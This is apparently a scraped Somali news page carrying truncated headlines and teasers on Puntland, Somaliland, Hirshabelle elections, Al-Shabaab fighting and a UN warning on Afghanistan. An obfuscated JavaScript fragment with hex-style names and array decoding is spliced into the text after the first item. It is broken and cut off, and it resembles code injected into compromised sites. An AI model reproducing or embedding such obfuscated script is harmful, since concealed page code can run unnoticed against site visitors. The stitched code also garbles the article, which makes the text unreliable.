Madaxweyne ku xigeenka Puntland oo qaabilay wafdi gaaray Garoowe
Madaxweyne Ku-xigeenka Puntland Mudane Axmed Cilmi Cismaan Karaash ayaa maanta xafiiskiisa ku qaabilay wefti uu hogaaminayo Wakiilka Hay'adda Islaamic Relief ee Soomaaliya Mudane Aliow Mohamed.
Kulanka waxaa looga hadlay mashaariicda horumarineed ee Hay'adda Islamic Relief ka fuliso deegaanada Puntland.
Madaxweyne Ku-xigeenka ayaa ku bogaadiyey Wakiilka shaqada wanaagsan ee ay Hay'addu ka waddo gudaha Puntland.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return...
Aqriso: Muuse Biixi oo sameeyey xilal ka qaadis iyo magacaabis
Muuse Biixi Cabdi madaxweynaha Somaliland ayaa maanta sameeyey xilka qaadis iyo magacaabis, kadib wareegto uu soo saaray.
Madaxweynaha Somaliland ayaa magacaabay guddoomiyeyaal degmo, agaasimaha guud ee bangiga dhexe iyo xubno kale.
Halkan hoose ka aqriso:-
Wareegto Madaxweyne
UJEEDDO: XIL KA-QAADIS
Ku: Axmed Cige Maxamed Geeddi;
Guddoomiyihii Hore ee Gobolka Hawd
Ku: Axmed Cismaan Xasan Cilmi;
Guddoomiyihii Hore ee Gobolka Sanaag
Ku: Axmed Xasan Cabdi Carwo;
Agaasimihii Guud ee Hore...
Ammaanka magaalada Jowhar oo aad loo adkeeyay + sababta
Ammaanka magaalada Jowhar ee caasimadda Dowlad gobaleedka Hirshabeelle, ayaa aad loo adkeeyay halkaasi oo lagu waddo in maalmaha soo socda ay ka dhacdo doorashada xubnaha Aqalka Sare ee Baarlamaanka Fedaraalka ka soo galaya Hirshabeelle.
Ciidanka Booliiska ayaa howlgallo lagu xaqiijinaayo ammaanka ka wadda xaafaddaha ay ka kooban tahay magaalada Jowhar.
Sida ku xusan Jadwalka Doorashada Xubnaha Aqalka sare, ayaa loo asteeyay...
Wararkii ugu dambeeyey ee dhex-dhexaadinta Farmaajo iyo Rooble
Faah faahino dheeraad ah ayaa waxaa laga helayaa dadaallada lagu dhex-dhexaadinayo madaxweynaha iyo ra'iisul wasaaraha ee haatan ka socda magaalada Muqdisho.
Wararka ayaa sheegaya in labada mas'uul ee ugu sarreyso dalka ay kulmayaan maanta, si ay wada-hadallo toos ah uga yeeshaan khilaafka u dhexeeya ee ka jira Villa Soomaaliya.
Dadaalladan ayaa waxaa hormuud ka ah madaxweynayaasha dowlad goboleedyada Koonfur Galbeed iyo...
Qaban-qaabada doorashada Aqalka Sare oo ka socota magaalada Jowhar
Wararka laga helayo gobolka Shabeelaha Dhexe ayaa sheegaya in haatan qaban-qaabadii ugu dambeeyey doorashada HirShabelle ee Aqalka Sare ay ka socoto magaalada Jowhar ee maamulkaasi, taas oo xiiso gooni ah xambaarsan marka loo eegto tartanka socda.
Sida qorshaha uu yahay diiwan-gelinta xubnaha musharixiinta ah ayaa ku eg gelinka dambe ee maanta, iyada oo beri musharixiintu ay sameynayaan hadal jeedintooda.
Ammaanka ayaa...
Faah faahino kasoo baxaya dagaal ka dhacay gobolka Jubbada Hoose
Warar dheeraad ah ayaa kasoo baxaya khasaaraha ka dhashay dagaal u dhexeeyey Al-Shabaab iyo ciidamada Kenya oo saacadihii lasoo dhaafay ka dhacay deegaan ka tirsan gobolka Jubbada Hoose ee koonfurta Soomaaliya.
Dagaalka ayaa yimid, kadib weerar ay dagaalyahanada Al-Shabaab ku qaadeen saldhig ciidanka Kenya ay ku leeyihiin deegaanka Cabdalle Biroole ee gobolkaasi.
Ilo dadka deegaanka ah ayaa Shabelle u sheegay in...
Ganacsade Soomaali ah oo lagu dilay dalka Koonfur Afrika + Magaca
Faah faahino dheeraad ah ayaa waxaa laga helayaa dil ay kooxo burcad Koonfur Afrikaan ah dalkaasi ugu geysteen muwaadin Soomaali ah oo ka mid ahaa Soomaalida ka ganacsata dalkaas.
Marxuumka ayaa waxaa lagu magacaabi jiray Maxamed Gacal waxaana lagu hor toogtay goobtiisa ganacsi oo kutaal Xaafadda Belhar oo ka tirsan Magalada Cape Town ee Dalkaasi Koonfur Afrika.
Sidoo kale kooxaha burcadda...
Puntland iyo Galmudug oo baaq u diray shacabka ku dhaqan gobolka Mudug
Guddoomiyaha Gobalka Muduga ee Puntland Cabdiladiif Muuse Nuur iyo guddoomiyaha Gobalka Muduga ee Galmudug Cabdiraxmaan Cali Diiriye Isxal, ayaa Ciidanka Daraawiishta Galmudug, kuwa dowlad gobaleedka Puntaland iyo ciidamada Qaranka Soomaaliyeed ku amaanay kaalinta wanaagsan ee ay Ka qaateen la dagaalanka xoogaga Al-Shabaab.
Dhanka kale waxay bulshada ku booriyeen in aysan ka daalin doorka fiican ee ay ka qaadanayaan halganka loogu...
QM oo digniin culus kasoo saartay xaaladda adag ee dalka Afgaanistaan
Qaramada Midoobay ayaa ka digtay in Afgaanistaan ay halis ugu jirto burbur guud, ka dib markii dalkaasi ay soo wajaheen dhibaatooyin ay ka mid yihiin, kor u kac weyn oo ku yimid qiimaha cuntada iyo shidaalka iyo lacag la’aan ka jirta bangiyada gaarka loo leeyahay.
Ergeyga gaarka ah ee Qaramada Midoobay u qaabilsan Afghanistan Deborah Lyons ayaa Khamiistii u sheegtay...
Madaxweyne Saciid Deni oo dalacsiiyey ciidamo iyo saraakiil
Madaxweynaha Puntland Siciid Cabdullaahi Deni ayaa wareeegto uu soo saaray min hal darajo ku dalacsiiyay saraakiil iyo saraakiil xigeeno ka tirsan ciidanka amniga gobolka Mudug.
Ciidamada la dalacsiiyay oo tiradoodu dhan tahay 17 sarkaal/sarkaal ku xigeen ayaa isugu jira Boolis, Daraawiish iyo Nabad-sugid, waxaana la sheegay in ay dalacsiinta ku muteysteen aqoon, karti iyo waaya-aragnimo ciidan.
Ciidamada Booliska
1. Waxa L/X/le Cabdiqani...













